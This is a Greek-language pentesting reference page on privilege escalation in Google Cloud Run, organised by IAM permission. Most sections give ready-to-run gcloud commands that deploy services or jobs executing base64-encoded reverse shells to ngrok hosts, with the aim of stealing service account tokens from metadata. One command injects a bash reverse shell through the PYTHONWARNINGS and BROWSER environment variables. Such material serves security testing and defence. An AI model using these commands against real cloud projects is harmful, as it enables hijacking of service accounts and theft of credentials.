GCP - Run Privesc

Cloud Run

Για περισσότερες πληροφορίες σχετικά με το Cloud Run, ελέγξτε:

run.services.create , iam.serviceAccounts.actAs, run.routes.invoke

Ένας επιτιθέμενος με αυτές τις άδειες για δημιουργία μιας υπηρεσίας run που εκτελεί αυθαίρετο κώδικα (αυθαίρετο Docker container), να συνδέσει μια Υπηρεσία Λογαριασμού σε αυτήν και να κάνει τον κώδικα να εξάγει το token της Υπηρεσίας Λογαριασμού από τα μεταδεδομένα.

Ένα σενάριο εκμετάλλευσης για αυτή τη μέθοδο μπορεί να βρεθεί εδώ και η εικόνα Docker μπορεί να βρεθεί εδώ.

Σημειώστε ότι όταν χρησιμοποιείτε gcloud run deploy αντί να δημιουργήσετε απλώς την υπηρεσία χρειάζεται την άδεια update. Ελέγξτε ένα παράδειγμα εδώ.

run.services.update , iam.serviceAccounts.actAs

Όπως η προηγούμενη αλλά ενημερώνοντας μια υπηρεσία:

# Launch some web server to listen in port 80 so the service works
echo "python3 -m http.server 80;sh -i >& /dev/tcp/0.tcp.eu.ngrok.io/14348 0>&1" | base64
# cHl0aG9uMyAtbSBodHRwLnNlcnZlciA4MDtzaCAtaSA+JiAvZGV2L3RjcC8wLnRjcC5ldS5uZ3Jvay5pby8xNDM0OCAwPiYxCg==

gcloud run deploy hacked \
--image=ubuntu:22.04 \  # Make sure to use an ubuntu version that includes python3
--command=bash \
--args="-c,echo cHl0aG9uMyAtbSBodHRwLnNlcnZlciA4MDtzaCAtaSA+JiAvZGV2L3RjcC8wLnRjcC5ldS5uZ3Jvay5pby8xNDM0OCAwPiYxCg== | base64 -d | bash" \
--service-account="<proj-num>-compute@developer.gserviceaccount.com" \
--region=us-central1 \
--allow-unauthenticated

# If you don't have permissions to use "--allow-unauthenticated", dont use it

run.services.setIamPolicy

Δώστε στον εαυτό σας προηγούμενες άδειες πάνω στο cloud Run.

run.jobs.create, run.jobs.run, iam.serviceaccounts.actAs,(run.jobs.get)

Εκκινήστε μια εργασία με ένα reverse shell για να κλέψετε τον λογαριασμό υπηρεσίας που υποδεικνύεται στην εντολή. Μπορείτε να βρείτε ένα exploit εδώ.

gcloud beta run jobs create jab-cloudrun-3326 \
--image=ubuntu:latest \
--command=bash \
--args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNC50Y3AuZXUubmdyb2suaW8vMTIxMzIgMD4mMQ== | base64 -d | bash" \
--service-account="<sa>@$PROJECT_ID.iam.gserviceaccount.com" \
--region=us-central1

run.jobs.update,run.jobs.run,iam.serviceaccounts.actAs,(run.jobs.get)

Παρόμοια με την προηγούμενη, είναι δυνατόν να ενημερώσετε μια εργασία και να ενημερώσετε το SA, την εντολή και να την εκτελέσετε:

gcloud beta run jobs update hacked \
--image=mubuntu:latest \
--command=bash \
--args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash" \
--service-account=<proj-num>-compute@developer.gserviceaccount.com \
--region=us-central1 \
--execute-now

run.jobs.setIamPolicy

Δώστε στον εαυτό σας τις προηγούμενες άδειες πάνω από τα Cloud Jobs.

run.jobs.run, run.jobs.runWithOverrides, (run.jobs.get)

Καταχρήστε τις μεταβλητές περιβάλλοντος μιας εκτέλεσης εργασίας για να εκτελέσετε αυθαίρετο κώδικα και να αποκτήσετε μια αντίστροφη θύρα για να εξάγετε τα περιεχόμενα του κοντέινερ (πηγαίος κώδικας) και να αποκτήσετε πρόσβαση στο SA μέσα στα μεταδεδομένα:

gcloud beta run jobs execute job-name --region <region> --update-env-vars="PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=/bin/bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/14195 0>&1' #%s"

Αναφορές

• https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/